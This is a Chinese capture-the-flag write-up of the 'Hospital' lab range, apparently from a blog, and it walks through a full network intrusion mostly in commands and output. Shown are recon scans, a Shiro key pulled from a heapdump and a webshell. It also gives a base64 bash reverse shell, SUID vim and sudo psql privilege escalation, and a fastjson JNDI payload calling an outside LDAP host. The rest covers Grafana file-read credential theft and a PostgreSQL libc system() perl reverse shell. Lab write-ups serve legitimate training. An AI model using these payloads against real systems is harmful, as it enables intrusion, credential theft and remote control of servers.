春秋云境Hospital

fscan

┌──────────────────────────────────────────────┐
│   ___                             _       │
│   / _ \     ___ ___ _ __ __ _ ___| | __   │
│ / /_\/____/ __|/ __| '__/ _` |/ __| |/ /   │
│ / /_\\_____\__ \ (__| | | (_| | (__|   <     │
│ \____/     |___/\___|_| \__,_|\___|_|\_\   │
└──────────────────────────────────────────────┘
    Fscan Version: 2.0.0

[2026-02-11 21:45:18] [INFO] 暴力破解线程数: 1
[2026-02-11 21:45:18] [INFO] 开始信息扫描
[2026-02-11 21:45:18] [INFO] 最终有效主机数量: 1
[2026-02-11 21:45:18] [INFO] 开始主机扫描
[2026-02-11 21:45:18] [INFO] 有效端口数量: 233
[2026-02-11 21:45:18] [SUCCESS] 端口开放 39.99.153.153:22
[2026-02-11 21:45:19] [SUCCESS] 服务识别 39.99.153.153:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.9 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.9.]
[2026-02-11 21:45:21] [SUCCESS] 端口开放 39.99.153.153:8080
[2026-02-11 21:45:26] [SUCCESS] 服务识别 39.99.153.153:8080 => [http]
[2026-02-11 21:45:27] [INFO] 存活端口数量: 2
[2026-02-11 21:45:27] [INFO] 开始漏洞扫描
[2026-02-11 21:45:27] [INFO] 加载的插件: ssh, webpoc, webtitle
[2026-02-11 21:45:28] [SUCCESS] 网站标题 http://39.99.153.153:8080 状态码:302 长度:0     标题:无标题 重定向地址: http://39.99.153.153:8080/login;jsessionid=142046F4F2A75BC50FC27362F2C6C649
[2026-02-11 21:45:28] [SUCCESS] 网站标题 http://39.99.153.153:8080/login;jsessionid=142046F4F2A75BC50FC27362F2C6C649 状态码:200 长度:2005   标题:医疗管理后台
[2026-02-11 21:45:32] [SUCCESS] 目标: http://39.99.153.153:8080
漏洞类型: poc-yaml-spring-actuator-heapdump-file
漏洞名称:
详细信息:
      author:AgeloVito
      links:https://www.cnblogs.com/wyb628/p/8567610.html
[2026-02-11 21:45:37] [SUCCESS] 扫描已完成: 3/3

http://xx.xx.xxx.xx:8080/actuator/beans发现有Shiro依赖

http://xx.xx.xx.xx:8080/actuator/heapdump

下载得到heapdump

===========================================
CookieRememberMeManager(ShiroKey)
-------------
algMode = CBC, key = GAYysgMQhG7/CzIJlVpR2g==, algName = AES

破解得到ShiroKey,工具连接

上传哥斯拉木马连接

反弹shell

bash -c '{echo,xxxxxxxxxxxxxxxxxxxxxxxxxxx}|{base64,-d}|{bash,-i}'
app@web01:~$ id
id
uid=1000(app) gid=1000(app) groups=1000(app)
app@web01:~$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/usr/bin/vim.basic
/usr/bin/su
/usr/bin/newgrp
/usr/bin/staprun
/usr/bin/at
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/chfn
/usr/bin/stapbpf
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/fusermount
/usr/bin/mount
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/bin/vim.basic -c ':python3 import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")'
[root@iZ2ze7q88ef5hrmxc09xntZ ~]# 
^[[2;2R O))                             O))             O))
O))     O))                         O) O))             O))
O))     O))   O))     O)))) O) O))     O)O) O)   O))     O))
O)))))) O)) O)) O)) O))   O) O)) O)) O))   O)) O)) O))
O))     O))O))   O)) O))) O)   O))O)) O)) O))   O)) O))
O))     O)) O)) O))     O))O)) O)) O)) O)) O))   O)) O))
O))     O))   O))   O)) O))O))     O))   O))   O)) O)))O)))
                          O))
flag01: flag{336e7f15-1dec-4321-8d81-e59bb1063f18}

然后上传fscan和代理工具

wget http://xx.xx.xx.xxx:8085/linux_x64_agent
wget http://xxx.xx.xx.xxx:8085/fscan

扫描内网

app@web01:/tmp$ ifconfig
ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
      inet 172.30.12.5 netmask 255.255.0.0 broadcast 172.30.255.255
      inet6 fe80::216:3eff:fe25:abb6 prefixlen 64 scopeid 0x20<link>
      ether 00:16:3e:25:ab:b6 txqueuelen 1000 (Ethernet)
      RX packets 228087 bytes 208899325 (208.8 MB)
      RX errors 0 dropped 0 overruns 0 frame 0
      TX packets 125662 bytes 58572411 (58.5 MB)
      TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
      inet 127.0.0.1 netmask 255.0.0.0
      inet6 ::1 prefixlen 128 scopeid 0x10<host>
      loop txqueuelen 1000 (Local Loopback)
      RX packets 1528 bytes 141488 (141.4 KB)
      RX errors 0 dropped 0 overruns 0 frame 0
      TX packets 1528 bytes 141488 (141.4 KB)
      TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
./fscan -h 172.30.12.5/24
┌──────────────────────────────────────────────┐
│   ___                             _       │
│   / _ \     ___ ___ _ __ __ _ ___| | __   │
│ / /_\/____/ __|/ __| '__/ _` |/ __| |/ /   │
│ / /_\\_____\__ \ (__| | | (_| | (__|   <     │
│ \____/     |___/\___|_| \__,_|\___|_|\_\   │
└──────────────────────────────────────────────┘
    Fscan Version: 2.0.0

[2026-02-11 22:24:08] [INFO] 暴力破解线程数: 1
[2026-02-11 22:24:08] [INFO] 开始信息扫描
[2026-02-11 22:24:08] [INFO] CIDR范围: 172.30.12.0-172.30.12.255
[2026-02-11 22:24:08] [INFO] 生成IP范围: 172.30.12.0.%!d(string=172.30.12.255) - %!s(MISSING).%!d(MISSING)
[2026-02-11 22:24:09] [INFO] 解析CIDR 172.30.12.5/24 -> IP范围 172.30.12.0-172.30.12.255
[2026-02-11 22:24:09] [INFO] 最终有效主机数量: 256
[2026-02-11 22:24:09] [INFO] 开始主机扫描
[2026-02-11 22:24:09] [INFO] 正在尝试无监听ICMP探测...
[2026-02-11 22:24:09] [INFO] 当前用户权限不足,无法发送ICMP包
[2026-02-11 22:24:09] [INFO] 切换为PING方式探测...
[2026-02-11 22:24:09] [SUCCESS] 目标 172.30.12.5     存活 (ICMP)
[2026-02-11 22:24:09] [SUCCESS] 目标 172.30.12.6     存活 (ICMP)
[2026-02-11 22:24:13] [SUCCESS] 目标 172.30.12.236   存活 (ICMP)
[2026-02-11 22:24:15] [INFO] 存活主机数量: 3
[2026-02-11 22:24:15] [INFO] 有效端口数量: 233
[2026-02-11 22:24:15] [SUCCESS] 端口开放 172.30.12.6:135
[2026-02-11 22:24:15] [SUCCESS] 端口开放 172.30.12.236:22
[2026-02-11 22:24:15] [SUCCESS] 端口开放 172.30.12.6:139
[2026-02-11 22:24:15] [SUCCESS] 端口开放 172.30.12.5:22
[2026-02-11 22:24:15] [SUCCESS] 端口开放 172.30.12.6:445
[2026-02-11 22:24:15] [SUCCESS] 端口开放 172.30.12.236:8009
[2026-02-11 22:24:15] [SUCCESS] 端口开放 172.30.12.5:8080
[2026-02-11 22:24:15] [SUCCESS] 端口开放 172.30.12.236:8080
[2026-02-11 22:24:15] [SUCCESS] 端口开放 172.30.12.6:8848
[2026-02-11 22:24:15] [SUCCESS] 服务识别 172.30.12.236:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.9 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.9.]
[2026-02-11 22:24:15] [SUCCESS] 服务识别 172.30.12.5:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.9 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.9.]
[2026-02-11 22:24:20] [SUCCESS] 服务识别 172.30.12.6:139 => Banner:[.]
[2026-02-11 22:24:20] [SUCCESS] 服务识别 172.30.12.6:445 =>
[2026-02-11 22:24:20] [SUCCESS] 服务识别 172.30.12.236:8009 =>
[2026-02-11 22:24:20] [SUCCESS] 服务识别 172.30.12.5:8080 => [http]
[2026-02-11 22:24:21] [SUCCESS] 服务识别 172.30.12.236:8080 => [http]
[2026-02-11 22:24:26] [SUCCESS] 服务识别 172.30.12.6:8848 => [http]
[2026-02-11 22:25:20] [SUCCESS] 服务识别 172.30.12.6:135 =>
[2026-02-11 22:25:20] [INFO] 存活端口数量: 9
[2026-02-11 22:25:20] [INFO] 开始漏洞扫描
[2026-02-11 22:25:20] [INFO] 加载的插件: findnet, ms17010, netbios, smb, smb2, smbghost, ssh, webpoc, webtitle
[2026-02-11 22:25:20] [SUCCESS] NetInfo 扫描结果
目标主机: 172.30.12.6
主机名: Server02
发现的网络接口:
  IPv4地址:
    └─ 172.30.12.6
[2026-02-11 22:25:20] [SUCCESS] NetBios 172.30.12.6     WORKGROUP\SERVER02            
[2026-02-11 22:25:20] [SUCCESS] 网站标题 http://172.30.12.5:8080   状态码:302 长度:0     标题:无标题 重定向地址: http://172.30.12.5:8080/login;jsessionid=23552E36C6008B327A4A93A9FD17E2E1
[2026-02-11 22:25:20] [SUCCESS] 网站标题 http://172.30.12.236:8080 状态码:200 长度:3964   标题:医院后台管理平台
[2026-02-11 22:25:20] [SUCCESS] 网站标题 http://172.30.12.5:8080/login;jsessionid=23552E36C6008B327A4A93A9FD17E2E1 状态码:200 长度:2005   标题:医疗管理后台
[2026-02-11 22:25:21] [SUCCESS] 网站标题 http://172.30.12.6:8848   状态码:404 长度:431   标题:HTTP Status 404 – Not Found
[2026-02-11 22:25:22] [SUCCESS] 目标: http://172.30.12.6:8848
漏洞类型: poc-yaml-alibaba-nacos
漏洞名称:
详细信息:
      author:AgeloVito
      links:https://blog.csdn.net/caiqiiqi/article/details/112005424
[2026-02-11 22:25:22] [SUCCESS] 目标: http://172.30.12.5:8080
漏洞类型: poc-yaml-spring-actuator-heapdump-file
漏洞名称:
详细信息:
      author:AgeloVito
      links:https://www.cnblogs.com/wyb628/p/8567610.html
[2026-02-11 22:25:23] [SUCCESS] 目标: http://172.30.12.6:8848
漏洞类型: poc-yaml-alibaba-nacos-v1-auth-bypass
漏洞名称:
详细信息:
      author:kmahyyg(https://github.com/kmahyyg)
      links:https://github.com/alibaba/nacos/issues/4593
[2026-02-11 22:31:23] [SUCCESS] 扫描已完成: 16/16
┌──(root㉿kali)-[~]
└─# proxychains4 -q nxc smb 172.30.12.5/24

SMB         172.30.12.6     445   Server02         [*] Windows 10 / Server 2019 Build 17763 x64 (name:Server02) (domain:Server02) (signing:False) (SMBv1:False)  

http://172.30.12.6:8848/nacos/#/login是Nacos,nacos/nacos登陆,得到一个配置文件

/*
* Demo for Nacos
* pom.xml
  <dependency>
      <groupId>com.alibaba.nacos</groupId>
      <artifactId>nacos-client</artifactId>
      <version>${version}</version>
  </dependency>
*/
package com.alibaba.nacos.example;

import java.util.Properties;
import java.util.concurrent.Executor;
import com.alibaba.nacos.api.NacosFactory;
import com.alibaba.nacos.api.config.ConfigService;
import com.alibaba.nacos.api.config.listener.Listener;
import com.alibaba.nacos.api.exception.NacosException;

/**
* Config service example
*
* @author Nacos
*
*/
public class ConfigExample {

public static void main(String[] args) throws NacosException, InterruptedException {
String serverAddr = "localhost";
String dataId = "db-config";
String group = "DEFAULT_GROUP";
Properties properties = new Properties();
properties.put(PropertyKeyConst.SERVER_ADDR, serverAddr);
ConfigService configService = NacosFactory.createConfigService(properties);
String content = configService.getConfig(dataId, group, 5000);
System.out.println(content);
configService.addListener(dataId, group, new Listener() {
@Override
public void receiveConfigInfo(String configInfo) {
System.out.println("recieve:" + configInfo);
}

@Override
public Executor getExecutor() {
return null;
}
});

boolean isPublishOk = configService.publishConfig(dataId, group, "content");
System.out.println(isPublishOk);

Thread.sleep(3000);
content = configService.getConfig(dataId, group, 5000);
System.out.println(content);

boolean isRemoveOk = configService.removeConfig(dataId, group);
System.out.println(isRemoveOk);
Thread.sleep(3000);

content = configService.getConfig(dataId, group, 5000);
System.out.println(content);
Thread.sleep(300000);

}
}

Nacos Client Yaml反序列化漏洞

E:\谷歌下载\yaml-payload-master\yaml-payload-master>javac src/artsploit/AwesomeScriptEngineFactory.java

E:\谷歌下载\yaml-payload-master\yaml-payload-master>jar -cvf yaml-payload.jar -C src/ .
已添加清单
正在添加: artsploit/(输入 = 0) (输出 = 0)(存储了 0%)
正在添加: artsploit/AwesomeScriptEngineFactory.class(输入 = 1683) (输出 = 715)(压缩了 57%)
正在添加: artsploit/AwesomeScriptEngineFactory.java(输入 = 1574) (输出 = 423)(压缩了 73%)
正在忽略条目META-INF/
正在添加: META-INF/services/(输入 = 0) (输出 = 0)(存储了 0%)
正在添加: META-INF/services/javax.script.ScriptEngineFactory(输入 = 36) (输出 = 38)(压缩了 -5%)

将jar包wget到入口机上,在入口机上python3 -m http.server 8001

然后看一下是否上传成功

┌──(root㉿kali)-[~]
└─# proxychains4 -q nxc rdp 172.30.12.6 -u sunsun -p qwer1234! --local-auth
RDP         172.30.12.6     3389   Server02         [*] Windows 10 or Windows Server 2016 Build 17763 (name:Server02) (domain:Server02) (nla:True)
RDP         172.30.12.6     3389   Server02         [+] Server02\sunsun:qwer1234! (Pwn3d!)
flag{5f3931d3-517f-4b6d-9210-baaaabf501c7}

医院后台管理平台:http://172.30.12.236:8080/是打fastjson

bp抓包测试,登陆传输数据位JSON格式,打fastjson反序列化,BP插件

POST /login HTTP/1.1
Host: 172.30.12.236:8080
Content-Length: 195
Cache-Control: max-age=0
Origin: http://172.30.12.236:8080
Content-Type: application/json
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://172.30.12.236:8080/login
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=8B77BFC8556AA71520003C86FDC1FC96
Connection: keep-alive

{
  "b":{
      "@type":"com.sun.rowset.JdbcRowSetImpl",     "dataSourceName":"ldap://s70wec1kgtrl8a32uryacql9m0srgh46.oastify.com",
      "autoCommit":true
  }
,"7xcrwmpt398":"="
}

哥斯拉连接

ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500        inet 172.30.12.236  netmask 255.255.0.0  broadcast 172.30.255.255        inet6 fe80::216:3eff:fe31:f69a  prefixlen 64  scopeid 0x20<link>        ether 00:16:3e:31:f6:9a  txqueuelen 1000  (Ethernet)        RX packets 147459  bytes 155383481 (155.3 MB)        RX errors 0  dropped 0  overruns 0  frame 0        TX packets 49781  bytes 32064178 (32.0 MB)        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500        inet 172.30.54.179  netmask 255.255.255.0  broadcast 172.30.54.255        inet6 fe80::216:3eff:fe31:f5f9  prefixlen 64  scopeid 0x20<link>        ether 00:16:3e:31:f5:f9  txqueuelen 1000  (Ethernet)        RX packets 2871  bytes 120582 (120.5 KB)        RX errors 0  dropped 0  overruns 0  frame 0        TX packets 2892  bytes 122188 (122.1 KB)        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536        inet 127.0.0.1  netmask 255.0.0.0        inet6 ::1  prefixlen 128  scopeid 0x10<host>        loop  txqueuelen 1000  (Local Loopback)        RX packets 5602  bytes 512817 (512.8 KB)        RX errors 0  dropped 0  overruns 0  frame 0        TX packets 5602  bytes 512817 (512.8 KB)        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0/root/flag >

双网卡,搭建多级代理,先fscan扫一下

172.30.54.179:8080 open
172.30.54.12:5432 open
172.30.54.12:22 open
172.30.54.12:3000 open
172.30.54.179:8009 open
172.30.54.179:22 open
[*] WebTitle http://172.30.54.12:3000  code:302 len:29     title:None 跳转url: http://172.30.54.12:3000/login
[*] WebTitle http://172.30.54.179:8080 code:200 len:3964   title:医院后台管理平台
[*] WebTitle http://172.30.54.12:3000/login code:200 len:27909  title:Grafana

Grafana存在CVE-2021-43798,利用web1服务,将需要的文件放web1上,在web3上wget web1就能实现文件传输

./linux_amd64* exp -u http://172.30.54.12:3000
2026/04/22 00:02:28 Target vulnerable has plugin [alertlist]2026/04/22 00:02:28 Got secret_key [SW2YcwTIb9zpOOhoPsMm]2026/04/22 00:02:28 There are [1] records in data_source table.2026/04/22 00:02:28 type:[postgres] name:[PostgreSQL] url:[localhost:5432] user:[postgres] password[Postgres@123] database:[postgres] basic_auth_user:[] basic_auth_password:[]2026/04/22 00:02:28 All Done, have nice day!

搭建多级代理,web3去连接web1

./linux_x64_agent -c 172.30.12.5:1234 -s 123 --reconnect 8

如图搭建好代理

然后我们去打postgresql,psql也可以创建函数执行命令但是没回显

┌──(root㉿kali)-[~]└─# proxychains4 -q psql -h 172.30.54.12 -U postgres -WPassword: psql (17.5 (Debian 17.5-1), server 8.1.0)WARNING: psql major version 17, server major version 8.1.         Some psql features might not work.Type "help" for help.
postgres=# ALTER USER root WITH PASSWORD 'Admin@123';ALTER ROLE
postgres=# CREATE OR REPLACE FUNCTION system (cstring) RETURNS integer AS '/lib/x86_64-linux-gnu/libc.so.6', 'system' LANGUAGE 'c' STRICT;select system('curl 172.30.54.179');CREATE FUNCTION system --------   1792(1 row)
postgres=# select system('perl -e \'use Socket;$i="172.30.54.179";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\'');

反弹shell

$ sudo -lMatching Defaults entries for postgres on web04:    env_reset, mail_badpass,    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User postgres may run the following commands on web04:    (ALL) NOPASSWD: /usr/local/postgresql/bin/psql
sudo /usr/local/postgresql/bin/psql
\?
!/bin/bash
cat /root/flag/flag04.txt
暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇